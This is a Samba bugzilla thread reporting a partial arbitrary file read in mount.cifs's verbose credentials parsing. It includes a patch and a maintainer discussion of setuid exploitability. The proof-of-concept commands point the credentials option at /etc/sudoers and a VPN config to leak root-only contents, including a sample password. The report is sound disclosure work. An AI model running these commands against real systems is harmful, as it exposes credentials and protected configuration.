[Bug 15026] New: Partial arbitrary file read via mount.cifs

[Bug 15026] New: Partial arbitrary file read via mount.cifs

[samba-bugs]

https://bugzilla.samba.org/show_bug.cgi?id=15026

            Bug ID: 15026
           Summary: Partial arbitrary file read via mount.cifs
           Product: CifsVFS
           Version: 5.x
          Hardware: All
                OS: All
            Status: NEW
          Severity: normal
          Priority: P5
         Component: user space tools
          Assignee: jlayton@samba.org
          Reporter: jbe@improsec.com
        QA Contact: cifs-qa@samba.org
                CC: sfrench@samba.org
  Target Milestone: ---

Partial arbitrary file read via mount.cifs

The following was tested on cifs-utils version 6.14.

The "credentials" option of mount.cifs binary allow for partial arbitrary file
disclosure when the verbose flag is set. When a credential line is invalid, the
following code is reached:

 571 static int open_cred_file(char *file_name,
 572                         struct parsed_mount_info *parsed_info)
 573 {
 ...
 637                 case CRED_UNPARSEABLE:
 638                         if (parsed_info->verboseflag)
 639                                 fprintf(stderr, "Credential formatted "
 640                                         "incorrectly: %s\n",
 641                                         temp_val ? temp_val : "(null)");

Because of how credential files are formatted, any part of a line after an
equal sign in an invalid line is printed. Such lines can be found in sensitive
files:

secure_path and rights in /etc/sudoers:

$ ls -l /etc/sudoers
-r--r----- 1 root root 670 Apr 20  2021 /etc/sudoers

$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o
credentials=/etc/sudoers
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly:
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Password for root@//127.0.0.1/share: 
mount.cifs kernel mount options:
ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable
address.

Passwords in /etc/openfortivpn/config:

$ ls -l /etc/openfortivpn/config
-rw------- 1 root root 154 Aug 28  2021 /etc/openfortivpn/config

$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o
credentials=/etc/openfortivpn/config
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly:  vpn.example.org
Credential formatted incorrectly:  443
Credential formatted incorrectly:  vpnuser
Credential formatted incorrectly:  VPNpassw0rd
Password for root@//127.0.0.1/share: 
mount.cifs kernel mount options:
ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable
address.

Note that either sudo rights on the mount.cifs binary or an entry in fstab are
needed to perform the read.

A possible mitigation is to get rid of the token value when printing the error
in verbose mode:

From: Jeffrey Bencteux <jbe@improsec.com>
Date: Sat, 19 Mar 2022 13:41:15 -0400
Subject: [PATCH] fix verbose message of credentials option

When supposed credential line is invalid, the verbose message prints
 part of it. This lead to information disclosure when the
 credentials file given is sensitive and contains '=' signs.

Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
---
 mount.cifs.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/mount.cifs.c b/mount.cifs.c
index 32521a7..82358a3 100644
--- a/mount.cifs.c
+++ b/mount.cifs.c
@@ -637,8 +637,7 @@ static int open_cred_file(char *file_name,
                case CRED_UNPARSEABLE:
                        if (parsed_info->verboseflag)
                                fprintf(stderr, "Credential formatted "
-                                       "incorrectly: %s\n",
-                                       temp_val ? temp_val : "(null)");
+                                       "incorrectly\n");
                        break;
                }
        }
-- 
2.33.0

-- 
You are receiving this mail because:
You are the QA Contact for the bug.

[Bug 15026] Partial arbitrary file read via mount.cifs

[samba-bugs]

https://bugzilla.samba.org/show_bug.cgi?id=15026

David Disseldorp <ddiss@samba.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
              Group|                            |samba-devel

-- 
You are receiving this mail because:
You are the QA Contact for the bug.

[Bug 15026] Partial arbitrary file read via mount.cifs

[samba-bugs]

https://bugzilla.samba.org/show_bug.cgi?id=15026

David Disseldorp <ddiss@samba.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
      Comment #1 is|1                           |0
            private|                            |

-- 
You are receiving this mail because:
You are the QA Contact for the bug.

[Bug 15026] Partial arbitrary file read via mount.cifs

[samba-bugs]

https://bugzilla.samba.org/show_bug.cgi?id=15026

--- Comment #2 from Jeffrey Bencteux <jbe@improsec.com> ---
(In reply to David Disseldorp from comment #1)

> Please correct me if I'm wrong, but I don't expect that this would be exploitable
> on regular systems unless mount.cifs is installed with setuid-root, or an attacker
> somehow has access to the "credentails" path fed into a mount.cifs invocation.

That is partially correct, note that on a vanilla Debian 10, mount.cifs is
setuid-root by default:

$ ls -l /usr/sbin/mount.cifs 
-rwsr-xr-x 1 root root 35600 Jun 17  2018 /usr/sbin/mount.cifs

And likely it is the case on other distributions as otherwise the following
message is returned:

$ ./mount.cifs //127.0.0.1/share /mnt/share -v -o credentials=/etc/sudoers
This program is not installed setuid root -  "user" CIFS mounts not supported.

It however seems needed to either:

1) have privileged user rights to trigger the bug, such as the below line in
/etc/sudoers:

testuser ALL=NOPASSWD: /usr/sbin/mount.cifs

Which is less likely but possible.

2) Have the scenario you depict where a user can tamper a mount with a rogue
"credentials" option value.

This greatly reduce the risk IMO.

I think the explanation is in these lines of mount.cifs.c:

 115  * When an unprivileged user runs a setuid mount.cifs, we set certain
mount
 116  * flags by default. These defaults can be changed here.
 117  */
 118 #define CIFS_SETUID_FLAGS (MS_NOSUID|MS_NODEV)

I expect some people to use rules such as the above sudo one to circumvent the
problem.

-- 
You are receiving this mail because:
You are the QA Contact for the bug.

[Bug 15026] Partial arbitrary file read via mount.cifs

[samba-bugs]

https://bugzilla.samba.org/show_bug.cgi?id=15026

--- Comment #3 from David Disseldorp <ddiss@samba.org> ---
(In reply to Jeffrey Bencteux from comment #2)
> (In reply to David Disseldorp from comment #1)
> 
> > Please correct me if I'm wrong, but I don't expect that this would be exploitable
> > on regular systems unless mount.cifs is installed with setuid-root, or an attacker
> > somehow has access to the "credentails" path fed into a mount.cifs invocation.
> 
> That is partially correct, note that on a vanilla Debian 10, mount.cifs is
> setuid-root by default:
> 
> $ ls -l /usr/sbin/mount.cifs 
> -rwsr-xr-x 1 root root 35600 Jun 17  2018 /usr/sbin/mount.cifs

Ouch. I assume Ubuntu inherits this default setting.

> And likely it is the case on other distributions as otherwise the following
> message is returned:
> 
> $ ./mount.cifs //127.0.0.1/share /mnt/share -v -o credentials=/etc/sudoers
> This program is not installed setuid root -  "user" CIFS mounts not
> supported.
> 
> It however seems needed to either:
> 
> 1) have privileged user rights to trigger the bug, such as the below line in
> /etc/sudoers:
> 
> testuser ALL=NOPASSWD: /usr/sbin/mount.cifs
> 
> Which is less likely but possible.
> 
> 2) Have the scenario you depict where a user can tamper a mount with a rogue
> "credentials" option value.
> 
> This greatly reduce the risk IMO.
> 
> I think the explanation is in these lines of mount.cifs.c:
> 
>  115  * When an unprivileged user runs a setuid mount.cifs, we set certain
> mount
>  116  * flags by default. These defaults can be changed here.
>  117  */
>  118 #define CIFS_SETUID_FLAGS (MS_NOSUID|MS_NODEV)
> 
> I expect some people to use rules such as the above sudo one to circumvent
> the problem.

I don't completely follow - so for the setuid-root case, can root-readable
files be dumped by regular users (ignoring apparmor/selinux) using
credentials=<root-only-path>, or do the dropped privileges mean that a
different approach (sudo) is needed?

-- 
You are receiving this mail because:
You are the QA Contact for the bug.